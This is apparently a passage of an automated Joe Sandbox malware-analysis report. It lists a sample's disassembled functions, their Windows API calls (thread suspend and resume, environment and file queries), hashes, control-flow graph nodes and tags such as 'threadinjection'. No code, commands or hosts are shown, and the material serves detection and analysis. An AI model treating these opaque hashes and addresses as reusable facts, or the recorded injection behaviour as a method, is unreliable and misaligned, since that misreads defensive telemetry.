                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Malloc
                                                                                        • String ID: (7$Z7
                                                                                        • API String ID: 2696272793-1636684695
                                                                                        • Opcode ID: 7993f3633ab03731d17ec0132c64a0c8d8142bacdc0f416e26aba7589ca57c8f
                                                                                        • Instruction ID: 704c36b0d40ca1d23c087077411247891e9e9a0cb014fb91f80dfbf4061a1757
                                                                                        • Opcode Fuzzy Hash: 7993f3633ab03731d17ec0132c64a0c8d8142bacdc0f416e26aba7589ca57c8f
                                                                                        • Instruction Fuzzy Hash: 2801E4B6640119BF9F069FA1DD49CAEBBBDEF08344B108159B906D7120E631AA44DBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00388268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0038BF30: GetEnvironmentStringsW.KERNEL32 ref: 0038BF39
                                                                                          • Part of subcall function 0038BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0038BF5C
                                                                                          • Part of subcall function 0038BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0038BF82
                                                                                          • Part of subcall function 0038BF30: _free.LIBCMT ref: 0038BF95
                                                                                          • Part of subcall function 0038BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0038BFA4
                                                                                        • _free.LIBCMT ref: 003882AE
                                                                                        • _free.LIBCMT ref: 003882B5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                        • String ID: 0"<
                                                                                        • API String ID: 400815659-1408697893
                                                                                        • Opcode ID: 42dfa383a465bdd28affc9e84fab505774441cb54ce13ecad444b25ddfb2999c
                                                                                        • Instruction ID: d43d7998bbae99f109b1947f12511610b6e2628786b1e6c23e773b13fbc0dd71
                                                                                        • Opcode Fuzzy Hash: 42dfa383a465bdd28affc9e84fab505774441cb54ce13ecad444b25ddfb2999c
                                                                                        • Instruction Fuzzy Hash: 3FE0E523605F4245D2A333792C02F6B06094FC1338BA50EDAF910DE1D3CE50880307A2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00370FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,00371101,?,?,0037117F,?,?,?,?,?,00371169), ref: 00370FEA
                                                                                        • GetLastError.KERNEL32(?,?,0037117F,?,?,?,?,?,00371169), ref: 00370FF6
                                                                                          • Part of subcall function 00366C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00366C54
                                                                                        Strings
                                                                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00370FFF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                        • API String ID: 1091760877-2248577382
                                                                                        • Opcode ID: 9062c21a788b6cc4f771356476503d9144bd0e9e2ee2c5d61e924fe5d1ca3847
                                                                                        • Instruction ID: c51c6b1530d51d359f0886f6d17d918585e578af6cb6d4f58353dcf3c2951199
                                                                                        • Opcode Fuzzy Hash: 9062c21a788b6cc4f771356476503d9144bd0e9e2ee2c5d61e924fe5d1ca3847
                                                                                        • Instruction Fuzzy Hash: 0FD05B7650493076C62333386C47DAF3908DB52771F514715F139652E5CA154D915691
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,0036DA55,?), ref: 0036E2A3
                                                                                        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0036DA55,?), ref: 0036E2B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindHandleModuleResource
                                                                                        • String ID: RTL
                                                                                        • API String ID: 3537982541-834975271
                                                                                        • Opcode ID: 23abb74c540e8fb215822df353a727a5742581abe4abbb156ac92823ea3c8a70
                                                                                        • Instruction ID: 0faca84771c2bb662c496ba56b0ee9b9174fc53d9d0639cc596d1385e7458fc2
                                                                                        • Opcode Fuzzy Hash: 23abb74c540e8fb215822df353a727a5742581abe4abbb156ac92823ea3c8a70
                                                                                        • Instruction Fuzzy Hash: 1FC0807124071066EB3227747C0DF836E5C9B01B15F05044DF142E93D1D6E7C944C7E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E467
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: p7$z7
                                                                                        • API String ID: 1269201914-1647427826
                                                                                        • Opcode ID: a0722e21fa3892017704a3a83a622334591e04b59abdb66e2de60b594b5f99ae
                                                                                        • Instruction ID: c94ea8b97e8df488469b5a13f293d2929d8f7977068e158cc949e9e28d8901bf
                                                                                        • Opcode Fuzzy Hash: a0722e21fa3892017704a3a83a622334591e04b59abdb66e2de60b594b5f99ae
                                                                                        • Instruction Fuzzy Hash: 17B012C62A9040BC3257A1151C02E37015CC0C8F50330D06EF83DC4481DC484C000533
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E455 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E467
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID: U7$z7
                                                                                        • API String ID: 1269201914-2516247399
                                                                                        • Opcode ID: c8d23bc62ec54a5a05e37811d936ea38a8da06823c66d2359304b5a557e62184
                                                                                        • Instruction ID: 574b132cf9873de47f0fc79d9deb62df0cf0af95fa764a257c2991338b786b76
                                                                                        • Opcode Fuzzy Hash: c8d23bc62ec54a5a05e37811d936ea38a8da06823c66d2359304b5a557e62184
                                                                                        • Instruction Fuzzy Hash: 22B012D62680007C321711111D02D37021CC0C4F10330D06EF639C4481DC4C0E010433
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:3.7%
                                                                                        Dynamic/Decrypted Code Coverage:75%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:12
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 16146 7ffd9bc4c1bd 16147 7ffd9bc4c1cb SuspendThread 16146->16147 16149 7ffd9bc4c2a4 16147->16149 16154 7ffd9bc4d960 16155 7ffd9bc4d99b ResumeThread 16154->16155 16157 7ffd9bc4da74 16155->16157 16150 7ffd9bc4dac9 16151 7ffd9bc4dad7 FindCloseChangeNotification 16150->16151 16153 7ffd9bc4dbb4 16151->16153 16158 7ffd9bc4f7e5 16159 7ffd9bc4f7ff GetFileAttributesW 16158->16159 16161 7ffd9bc4f8c5 16159->16161

                                                                                        Executed Functions

                                                                                        Function 00007FFD9BAA0DA7 Relevance: .3, Instructions: 291COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 295 7ffd9baa0da7-7ffd9baa0db7 296 7ffd9baa0dba-7ffd9baa0df9 295->296 297 7ffd9baa0db9 295->297 299 7ffd9baa0dfb 296->299 300 7ffd9baa0e00-7ffd9baa0eb7 call 7ffd9baa07c8 296->300 297->296 299->300 313 7ffd9baa0eb9-7ffd9baa0ece 300->313 314 7ffd9baa0ecf-7ffd9baa0fa8 300->314 313->314 327 7ffd9baa0faa-7ffd9baa0fbe 314->327 328 7ffd9baa0fc0-7ffd9baa0fe3 314->328 327->328 332 7ffd9baa0feb-7ffd9baa10dc 328->332
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 21f4da2bb07cb0d7e4244bbd012c1a78ac99b1976f86c53606d8b994037c5edd
                                                                                        • Instruction ID: 1561f2199255fe00cd45b4c51c109920fdbf8c01a52a1efc644109e13248b09e
                                                                                        • Opcode Fuzzy Hash: 21f4da2bb07cb0d7e4244bbd012c1a78ac99b1976f86c53606d8b994037c5edd
                                                                                        • Instruction Fuzzy Hash: 6CA1DEB1A1994D8FE7A8DB68C8657AD7BE1FF99310F0002BAD00DD72D6DBB41805C750
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC4D960 Relevance: 1.7, APIs: 1, Instructions: 161threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1934851250.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9bc40000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 555d51141c5db86268d8ae96c9d6b16177ab121d35c32442689755b054aeedc8
                                                                                        • Instruction ID: 8953c6acf4c6b5c657014f712f050e19992a39b971c0d023e57ef1e5f26aea37
                                                                                        • Opcode Fuzzy Hash: 555d51141c5db86268d8ae96c9d6b16177ab121d35c32442689755b054aeedc8
                                                                                        • Instruction Fuzzy Hash: 06517A7090C78C8FDB59EFA8D894BE9BBF0EF56310F1441ABD049DB292DA749946CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC4DAC9 Relevance: 1.6, APIs: 1, Instructions: 148COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1934851250.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9bc40000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChangeCloseFindNotification
                                                                                        • String ID:
                                                                                        • API String ID: 2591292051-0
                                                                                        • Opcode ID: 1c4a06b8716eca866b53bdec78827c66b292c6b966d7b1234f2c005442755967
                                                                                        • Instruction ID: f4d0ee3fc29203a6211fdc554c692196c7f81efa6443b278c31774e8c7c0c3a6
                                                                                        • Opcode Fuzzy Hash: 1c4a06b8716eca866b53bdec78827c66b292c6b966d7b1234f2c005442755967
                                                                                        • Instruction Fuzzy Hash: 8B415B30E0865C8FDB58DFA8D895BEDBBF0FF5A310F1041AAD049D7292DA74A985CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC4C1BD Relevance: 1.6, APIs: 1, Instructions: 142threadinjectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 22 7ffd9bc4c1bd-7ffd9bc4c1c9 23 7ffd9bc4c1d4-7ffd9bc4c2a2 SuspendThread 22->23 24 7ffd9bc4c1cb-7ffd9bc4c1d3 22->24 28 7ffd9bc4c2a4 23->28 29 7ffd9bc4c2aa-7ffd9bc4c2f4 23->29 24->23 28->29
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1934851250.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9bc40000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID: SuspendThread
                                                                                        • String ID:
                                                                                        • API String ID: 3178671153-0
                                                                                        • Opcode ID: f56a86ade5d026d775c680a65857e0b16aadeb0c3413414441efe0bcb5673514
                                                                                        • Instruction ID: 6e5fd9f0944486eee5cdb762805af6cfe4d60633fc1fbfc8cb599d84a2e5bdac
                                                                                        • Opcode Fuzzy Hash: f56a86ade5d026d775c680a65857e0b16aadeb0c3413414441efe0bcb5673514
                                                                                        • Instruction Fuzzy Hash: 86414970E0864C8FDB98DFA8C895AEDBBF0FF5A311F10416AD449E7292DA71A945CF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BC4F7E5 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 32 7ffd9bc4f7e5-7ffd9bc4f8c3 GetFileAttributesW 36 7ffd9bc4f8cb-7ffd9bc4f909 32->36 37 7ffd9bc4f8c5 32->37 37->36
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1934851250.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9bc40000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 4e29f00dc868080c2c680eec322fec27ab13ab442d5ac1b920b0fd6deb4c36b7
                                                                                        • Instruction ID: da0488c7f50dfdf8f511e59f44e874cce6e4c072f6070399684a18427090669b
                                                                                        • Opcode Fuzzy Hash: 4e29f00dc868080c2c680eec322fec27ab13ab442d5ac1b920b0fd6deb4c36b7
                                                                                        • Instruction Fuzzy Hash: E6410870E08A4C8FDB98DF98D895BEDBBF1FB5A310F10416ED049E7252DA70A845CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAA960E Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: M
                                                                                        • API String ID: 0-3664761504
                                                                                        • Opcode ID: b64196ada6fc65fbd9b84ad3c3b0babc8cb6877242ad433aff47c0a228e79566
                                                                                        • Instruction ID: 11eadea7614fe083807996c750bb52fce3ff53ca87085fb4e3a6a6b89eb81976
                                                                                        • Opcode Fuzzy Hash: b64196ada6fc65fbd9b84ad3c3b0babc8cb6877242ad433aff47c0a228e79566
                                                                                        • Instruction Fuzzy Hash: 0A012D30A055198FDBA4DB18C4987A9B3F1EB59311F1042F9D40DE3290CB786AC4CF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9C1773FE Relevance: .2, Instructions: 192COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 366 7ffd9c1773fe-7ffd9c177407 367 7ffd9c17740e-7ffd9c177414 366->367 368 7ffd9c1774ab-7ffd9c177514 367->368 369 7ffd9c17741a-7ffd9c177422 367->369 380 7ffd9c17751e-7ffd9c177589 368->380 381 7ffd9c177516-7ffd9c177517 368->381 370 7ffd9c17764e-7ffd9c17765e 369->370 374 7ffd9c177665-7ffd9c17766d 370->374 389 7ffd9c177593-7ffd9c1775fb 380->389 390 7ffd9c17758b-7ffd9c17758c 380->390 381->380 398 7ffd9c1775fd-7ffd9c1775fe 389->398 399 7ffd9c177605-7ffd9c17761b 389->399 390->389 398->399 401 7ffd9c177621 399->401 402 7ffd9c1773e5-7ffd9c177628 399->402 401->374 402->370
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1940308305.00007FFD9C170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C170000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9c170000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6ce1d662afb9350ec0199e12f8f0133207ef886663d8e9c2ef3a8dc9edfc2252
                                                                                        • Instruction ID: 941fe8e4eefa66b1e99997b848efbd4b4c2585073d5a9f300f4cab7b776d8fe9
                                                                                        • Opcode Fuzzy Hash: 6ce1d662afb9350ec0199e12f8f0133207ef886663d8e9c2ef3a8dc9edfc2252
                                                                                        • Instruction Fuzzy Hash: 195150317598098FEB95FF6C84A8EB973D2EF68305B1044B9E10EC72AADE25E841C741
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9C179468 Relevance: .2, Instructions: 182COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1940308305.00007FFD9C170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C170000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9c170000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dec988e71d88a3b836e0e7ba0b61d765e6c9761496b623826aa682e69c60788d
                                                                                        • Instruction ID: 87ff15d72f89c8dae6b0e8b804c660ff0fb1b1bbfaa88da9cdf42851b5683b0a
                                                                                        • Opcode Fuzzy Hash: dec988e71d88a3b836e0e7ba0b61d765e6c9761496b623826aa682e69c60788d
                                                                                        • Instruction Fuzzy Hash: A3618171A1865E8FEB55DB94C8A5BAD77F1FF68300F1401BAD00DE7292DB386885CB41
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAA1715 Relevance: .1, Instructions: 140COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 709c394f076724a9d5b902afbdbd4c47d1d8c994cfd562e94a8a86d61aceb10a
                                                                                        • Instruction ID: 3944c5ee458ecc5c8604a8bbda8e45f605dfdc1bb9fd01239782d00059a8a132
                                                                                        • Opcode Fuzzy Hash: 709c394f076724a9d5b902afbdbd4c47d1d8c994cfd562e94a8a86d61aceb10a
                                                                                        • Instruction Fuzzy Hash: 90413331A0E64E9FE761ABA8C8246E977A1FF52310F0505B6D05D871E1EA787A48CF21
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAA08D0 Relevance: .1, Instructions: 140COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 472 7ffd9baa08d0-7ffd9baa08d9 474 7ffd9baa0916-7ffd9baa095f 472->474 475 7ffd9baa08db-7ffd9baa08e6 472->475 475->474
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 675eb59a8d48f8f8d3da9cafdb8afdf0f94c5f3ec2c224d3b545ce85108dd35b
                                                                                        • Instruction ID: 6913204d5c9b1eeff1f42d3f030d0f0c17f99654a694920386256c0e55ec0ed5
                                                                                        • Opcode Fuzzy Hash: 675eb59a8d48f8f8d3da9cafdb8afdf0f94c5f3ec2c224d3b545ce85108dd35b
                                                                                        • Instruction Fuzzy Hash: F341E831E0855D5ED754FBA8A8A5AFC7BA0FF5832AF0402BBE44DCB197CE246481C780
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAA0908 Relevance: .1, Instructions: 133COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 75ff6b85ce7d8759b58bc6b986075784879e7b532d7ac8910cca34d54d253f21
                                                                                        • Instruction ID: 0ed140c047dd1675d10a45007ff25d88dbb08b1a5627b30d4eac2e1e9d8ea451
                                                                                        • Opcode Fuzzy Hash: 75ff6b85ce7d8759b58bc6b986075784879e7b532d7ac8910cca34d54d253f21
                                                                                        • Instruction Fuzzy Hash: 78517B30A0591E9FCF84EF98D484EEDBBF1FF58324F050169E419E7260CA74E9908B90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAA0998 Relevance: .1, Instructions: 107COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1932757306.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ffd9baa0000_hyperbrokerhostNetsvc.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 022154b8be8ef023f993c8f85cf523b5037bc16ee9aafcc8c0109ef6b6fc10f3
                                                                                        • Instruction ID: 06fa4a8111b508ec24e3ff7edaa710ef15aaa5046ccc8d072a1963af51cbd277
                                                                                        • Opcode Fuzzy Hash: 022154b8be8ef023f993c8f85cf523b5037bc16ee9aafcc8c0109ef6b6fc10f3
                                                                                        • Instruction Fuzzy Hash: 29313870A1495D8FDF94EF98C894AEDB7F1FF68300F00016AE419E32A5DB74A981CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00007FFD9BAA61DF Relevance: .1, Instructions: 105COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
